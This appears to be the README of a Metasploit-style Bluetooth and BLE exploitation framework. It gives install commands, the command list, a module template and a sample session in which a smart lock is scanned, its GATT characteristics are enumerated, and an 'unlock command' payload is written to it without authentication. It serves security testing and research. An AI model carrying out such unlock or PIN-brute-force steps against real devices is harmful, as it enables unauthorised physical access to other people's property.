Bluetooth Exploitation Framework
A Metasploit-style modular framework for Bluetooth Classic and BLE security testing.
I started building this with a purpose. Since itβs an early version, there may be stability issues and false positives. Iβm still working on it, so please be patient.
- π Device Discovery - Scan for nearby BLE and Classic Bluetooth devices
- π GATT Enumeration - Enumerate services, characteristics, and descriptors
- π Exploit Modules - Ready-to-use exploits for common vulnerabilities
- π Credential Testing - Test for default/weak PINs and pairing vulnerabilities
- π Modular Architecture - Easy to extend with custom modules
- πΎ Result Export - Save scan results and loot to JSON
# Clone the repository
git clone https://github.com/v33ru/bluesploit.git
cd bluesploit
#create python virtual environment
python3 -m venv env
source env/bin/activate
# Install dependencies
pip install -r requirements.txt
# Run BlueSploit
python bluesploit.py
- Python 3.10+
- Bluetooth adapter (built-in or USB dongle)
- Linux:
bluezstack installed - macOS: Works out of the box
- Windows: Requires Windows 10+ with BLE support
$ python bluesploit.py
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β βββββββ βββ βββ ββββββββββββββββββββββββββ βββ βββββββ ββββββββββββ β
β βββββββββββ βββ ββββββββββββββββββββββββββββββ βββββββββββββββββββββ β
β βββββββββββ βββ βββββββββ βββββββββββββββββββ βββ ββββββ βββ β
β βββββββββββ βββ βββββββββ βββββββββββββββ βββ βββ ββββββ βββ β
β ββββββββββββββββββββββββββββββββββββββββββββ ββββββββββββββββββββ βββ β
β βββββββ ββββββββ βββββββ βββββββββββββββββββ ββββββββ βββββββ βββ βββ β
β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β β
β Bluetooth Exploitation Framework v1.0.0 β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β
β β Author : v33ru / Mr-IoT β
β β Community : IoT Security Research Group (IOTSRG) β
β β GitHub : https://github.com/v33ru β
β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β β
β [+] BLE Scanning & Enumeration [+] GATT Service Analysis β
β [+] Bluetooth Classic Attacks [+] Vulnerability Detection β
β [+] Exploitation Modules [+] Protocol Reverse Engineering β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Type 'help' for commands Type 'show modules' to list modules β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
bluesploit > help
Core Commands
=============
use <module> Load a module
back Unload current module
search <keyword> Search for modules
show <type> Show modules/options
Module Commands
===============
set <opt> <val> Set module option
unset <option> Clear module option
options Show module options
info Show module info
run / exploit Execute module
check Check if vulnerable
Utility Commands
================
clear Clear screen
reload Reload modules
setg <opt> <val> Set global option
banner Show banner
exit / quit Exit BlueSploit
bluesploit > use scanners/ble/discovery
bluesploit (scanners/ble/discovery) > set timeout 15
bluesploit (scanners/ble/discovery) > run
[*] Scanning for BLE devices (15s)...
[+] AA:BB:CC:DD:EE:FF - Smart Lock [-45 dBm] [Nordic Semiconductor]
[+] 11:22:33:44:55:66 - MI Band 7 [-62 dBm] [Xiaomi]
[+] Found 2 devices
bluesploit > use scanners/ble/gatt_enum
bluesploit (scanners/ble/gatt_enum) > set target AA:BB:CC:DD:EE:FF
bluesploit (scanners/ble/gatt_enum) > run
[+] Connected to AA:BB:CC:DD:EE:FF
[*] Enumerating GATT services...
[Service] 00001800-0000-1000-8000-00805f9b34fb
Generic Access (Handle: 0x0001)
βββ [Char] 00002a00-0000-1000-8000-00805f9b34fb
β Device Name
β Properties: read
β Value: Smart Lock
[Service] 0000fee0-0000-1000-8000-00805f9b34fb
Custom Service (Handle: 0x0010)
βββ [Char] 0000fee1-0000-1000-8000-00805f9b34fb β VULN
β Properties: write-without-response, notify
β β UNAUTH_WRITE_POSSIBLE: Write-without-response enabled
bluesploit > use exploits/ble/unauth_write
bluesploit (exploits/ble/unauth_write) > set target AA:BB:CC:DD:EE:FF
bluesploit (exploits/ble/unauth_write) > set char_uuid 0000fee1-0000-1000-8000-00805f9b34fb
bluesploit (exploits/ble/unauth_write) > set payload 0601 # Unlock command
bluesploit (exploits/ble/unauth_write) > check
[*] Checking AA:BB:CC:DD:EE:FF for vulnerability...
[+] Found characteristic: 0000fee1-0000-1000-8000-00805f9b34fb
[+] VULNERABLE: Write-without-response enabled!
bluesploit (exploits/ble/unauth_write) > run
[+] Connected to AA:BB:CC:DD:EE:FF
[+] Payload delivered!
modules/
βββ scanners/ # Discovery & enumeration
β βββ ble/
β β βββ discovery.py # BLE device discovery
β β βββ gatt_enum.py # GATT service enumeration
β βββ classic/
β βββ sdp_enum.py # SDP service discovery
βββ exploits/ # Vulnerability exploits
β βββ ble/
β β βββ unauth_write.py # Unauthenticated GATT write
β βββ classic/
β βββ ...
βββ creds/ # Credential attacks (this is not right folder fixing soon full release)
β βββ ...
βββ auxiliary/ # Support modules
β βββ ...
βββ payloads/ # Payload generators
βββ ...
Create a new module in the appropriate directory:
# modules/scanners/ble/my_scanner.py
from core.base import ScannerModule, ModuleInfo, ModuleOption, BTProtocol, Severity
class Module(ScannerModule):
info = ModuleInfo(
name="scanners/ble/my_scanner",
description="My custom BLE scanner",
author=["your_name"],
protocol=BTProtocol.BLE,
severity=Severity.INFO
)
def _setup_options(self):
self.options = {
"target": ModuleOption("target", True, "Target BD_ADDR"),
"timeout": ModuleOption("timeout", False, "Scan timeout", default=10)
}
def run(self) -> bool:
# Your scanning logic here
target = self.get_option("target")
print(f"Scanning {target}...")
return TrueContributions are welcome! Please feel free to submit a Pull Request.
- Fork the repository
- Create your feature branch (
git checkout -b feature/new-module) - Commit your changes (
git commit -am 'Add new module') - Push to the branch (
git push origin feature/new-module) - Open a Pull Request
- Bluetooth Classic support (BR/EDR)
- PIN bruteforce module
- BTSnoop log analyzer (GhostWrite integration)
- Replay attack module
- Database for session/loot storage
- Ubertooth integration
- BTLEJuice integration
This tool is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Users are responsible for complying with all applicable laws. The authors assume no liability for misuse.
v33ru / Mr-IoT - IoT Security Research Group (IOTSRG)
- GitHub: @v33ru
- Research: Pre-Pairing Attack Surface in BLE
MIT License - See LICENSE for details.
- Inspired by RouterSploit and Metasploit
- Built with Bleak for cross-platform BLE support
- Thanks to the Bluetooth security research community